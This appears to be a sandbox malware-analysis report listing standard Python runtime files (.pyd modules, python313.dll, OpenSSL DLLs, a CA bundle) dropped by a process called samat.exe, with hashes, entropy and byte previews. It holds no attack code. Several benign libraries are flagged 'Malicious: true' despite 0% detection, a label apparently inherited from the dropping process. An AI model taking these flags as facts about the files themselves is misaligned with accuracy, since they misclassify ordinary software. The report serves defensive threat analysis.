Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64272
Entropy (8bit):	6.220967684620152
Encrypted:	false
SSDEEP:	768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
MD5:	32D76C9ABD65A5D2671AEEDE189BC290
SHA1:	0D4440C9652B92B40BB92C20F3474F14E34F8D62
SHA-256:	838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
SHA-512:	49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	157968
Entropy (8bit):	6.854644275249963
Encrypted:	false
SSDEEP:	3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
MD5:	1BA022D42024A655CF289544AE461FB8
SHA1:	9772A31083223ECF66751FF3851D2E3303A0764C
SHA-256:	D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
SHA-512:	2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....\|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35600
Entropy (8bit):	6.416657776501014
Encrypted:	false
SSDEEP:	768:6wehui7ZmQW/3OUDxEiNIJntJ5YiSyvSJz2Ec:whuilG+UDxEiNIJntX7Sy+zO
MD5:	705AC24F30DC9487DC709307D15108ED
SHA1:	E9E6BA24AF9947D8995392145ADF62CAC86BA5D8
SHA-256:	59134B754C6ACA9449E2801E9E7ED55279C4F1ED58FE7A7A9F971C84E8A32A6C
SHA-512:	F5318EBB91F059F0721D75D576B39C7033D566E39513BAD8E7E42CCC922124A5205010415001EE386495F645238E2FF981A8B859F0890DC3DA4363EB978FDBA7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.Y)v.7zv.7zv.7z..zt.7zf,6{t.7zf,4{u.7zf,3{~.7zf,2{{.7z>-6{t.7zv.6z..7z=.6{s.7z>-:{t.7z>-7{w.7z>-.zw.7z>-5{w.7zRichv.7z........PE..d......g.........." ...). ...>......@...............................................%.....`......................................... E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata..6 ...0..."...$..............@..@.data...p....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	55568
Entropy (8bit):	6.3313243577146485
Encrypted:	false
SSDEEP:	1536:+kMm7HdG/l5fW3UguCE+eRIJWtd7SyJds:+wIQUFCEbRIJWtd6
MD5:	A72527454DD6DA346DDB221FC729E3D4
SHA1:	0276387E3E0492A0822DB4EABE23DB8C25EF6E6F
SHA-256:	404353D7B867749FA2893033BD1EBF2E3F75322D4015725D697CFA5E80EC9D0F
SHA-512:	FEFB543D20520F86B63E599A56E2166599DFA117EDB2BEB5E73FC8B43790543702C280A05CCFD9597C0B483F637038283DD48EF8C88B4EA6BAC411EC0043B10A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.{X/.(X/.(X/.(QW_(\/.(H..)Z/.(H..)[/.(H..)P/.(H..)T/.(...)Z/.(X/.(//.(.W.)]/.(.W.)Y/.(...)Y/.(...)Y/.(..3(Y/.(...)Y/.(RichX/.(........................PE..d.....g.........." ...).L...`......@................................................}....`.............................................X................................/......(....f..T............................e..@............`...............................text....J.......L.................. ..`.rdata...8...`...:...P..............@..@.data...@...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	33552
Entropy (8bit):	6.446391764486538
Encrypted:	false
SSDEEP:	384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
MD5:	1C03CAA59B5E4A7FB9B998D8C1DA165A
SHA1:	8A318F80A705C64076E22913C2206D9247D30CD7
SHA-256:	B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
SHA-512:	783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83728
Entropy (8bit):	6.331814573029388
Encrypted:	false
SSDEEP:	1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
MD5:	FE896371430BD9551717EF12A3E7E818
SHA1:	E2A7716E9CE840E53E8FC79D50A77F40B353C954
SHA-256:	35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
SHA-512:	67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m\|.ll}..o\|.ll}..h\|.ll}..i\|.ll}..m\|.ll}.lm}.ll}..m\|.ll}..a\|.ll}..l\|.ll}..}.ll}..n\|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...\|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	128272
Entropy (8bit):	6.294497957566744
Encrypted:	false
SSDEEP:	3072:N+tZdKmXhyn/qO6ItCpz6j5yQyshiKftdIJvQJL:NGZVwnxHssj5lhiYR
MD5:	D4E5BE27410897AC5771966E33B418C7
SHA1:	5D18FF3CC196557ED40F2F46540B2BFE02901D98
SHA-256:	3E625978D7C55F4B609086A872177C4207FB483C7715E2204937299531394F4C
SHA-512:	4D40B4C6684D3549C35ED96BEDD6707CE32DFAA8071AEADFBC682CF4B7520CFF08472F441C50E0D391A196510F8F073F26AE8B2D1E9B1AF5CF487259CC6CCC09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............................................................[.....`..........................................{..P...P{.........................../..............T...............................@...............H............................text...t........................... ..`.rdata.............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	181520
Entropy (8bit):	5.972827303352998
Encrypted:	false
SSDEEP:	3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
MD5:	1C0E3E447F719FBE2601D0683EA566FC
SHA1:	5321AB73B36675B238AB3F798C278195223CD7B1
SHA-256:	63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
SHA-512:	E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38160
Entropy (8bit):	6.338856805460127
Encrypted:	false
SSDEEP:	768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
MD5:	1C30CC7DF3BD168D883E93C593890B43
SHA1:	31465425F349DAE4EDAC9D0FEABC23CE83400807
SHA-256:	6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
SHA-512:	267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1394456
Entropy (8bit):	5.531698507573688
Encrypted:	false
SSDEEP:	12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:	A9CBD0455B46C7D14194D1F18CA8719E
SHA1:	E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:	DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:	B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:	false
Preview:	PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

C:\Users\user\AppData\Local\Temp\_MEI52282\certifi\cacert.pem

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299427
Entropy (8bit):	6.047872935262006
Encrypted:	false
SSDEEP:	6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
MD5:	50EA156B773E8803F6C1FE712F746CBA
SHA1:	2C68212E96605210EDDF740291862BDF59398AEF
SHA-256:	94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
SHA-512:	01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
Malicious:	false
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.818583535960129
Encrypted:	false
SSDEEP:	96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
MD5:	56FE4F6C7E88212161F49E823CCC989A
SHA1:	16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
SHA-256:	002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
SHA-512:	7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	124928
Entropy (8bit):	5.953784637413928
Encrypted:	false
SSDEEP:	3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
MD5:	10116447F9276F10664BA85A5614BA3A
SHA1:	EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
SHA-256:	C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
SHA-512:	C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\libcrypto-3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5232408
Entropy (8bit):	5.940072183736028
Encrypted:	false
SSDEEP:	98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
MD5:	123AD0908C76CCBA4789C084F7A6B8D0
SHA1:	86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
SHA-256:	4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
SHA-512:	80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.\|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...\|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\libffi-8.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39696
Entropy (8bit):	6.641880464695502
Encrypted:	false
SSDEEP:	768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
MD5:	0F8E4992CA92BAAF54CC0B43AACCCE21
SHA1:	C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
SHA-256:	EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
SHA-512:	6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\libssl-3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	792856
Entropy (8bit):	5.57949182561317
Encrypted:	false
SSDEEP:	12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
MD5:	4FF168AAA6A1D68E7957175C8513F3A2
SHA1:	782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
SHA-256:	2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
SHA-512:	C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...\|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	201488
Entropy (8bit):	6.375994899027017
Encrypted:	false
SSDEEP:	6144:cAPHiRwroqoLHMpCSNVysh9CV2i6P/1vTg:6wrExSU6PdvTg
MD5:	CF2C3D127F11CB2C026E151956745564
SHA1:	B1C8C432FC737D6F455D8F642A4F79AD95A97BD3
SHA-256:	D3E81017B4A82AE1B85E8CD6B9B7EB04D8817E29E5BC9ECE549AC24C8BB2FF23
SHA-512:	FE3A9C8122FFFF4AF7A51DF39D40DF18E9DB3BC4AED6B161A4BE40A586AC93C1901ACDF64CC5BFFF6975D22073558FC7A37399D016296432057B8150848F636E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P.P.P.(t..P...P...P...P...P....P..(.P.P..P....P....P......P....P.Rich.P.........................PE..d.....g.........." ...)..................................................... ............`............................................P... ............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6083856
Entropy (8bit):	6.126922729922386
Encrypted:	false
SSDEEP:	49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
MD5:	B9DE917B925DD246B709BB4233777EFD
SHA1:	775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
SHA-256:	0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
SHA-512:	F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32\pywintypes313.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	135680
Entropy (8bit):	6.0205382324631955
Encrypted:	false
SSDEEP:	3072:q9GPDeI1KuOQEbULZYY/r06YrqHXmZEdb/XAnLT:GgDJ1vOlbfY/rke3mZE9/XA
MD5:	2A87D04E9E7CBFF67E8EA4F6315C0EBB
SHA1:	CF5B2BB53B37087ECA18E509B8551ED5CB7575D9
SHA-256:	D011068781CFBA0955258505DBE7E5C7D3D0B955E7F7640D2F1019D425278087
SHA-512:	2138E051AC116D3ABE11101C75F8BD8388D7FBA89B15E6F82DC35FD78BDD913ED8BA468769F68440CE7834825806281AA15F0023855E3B8248266414D60A4A44
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
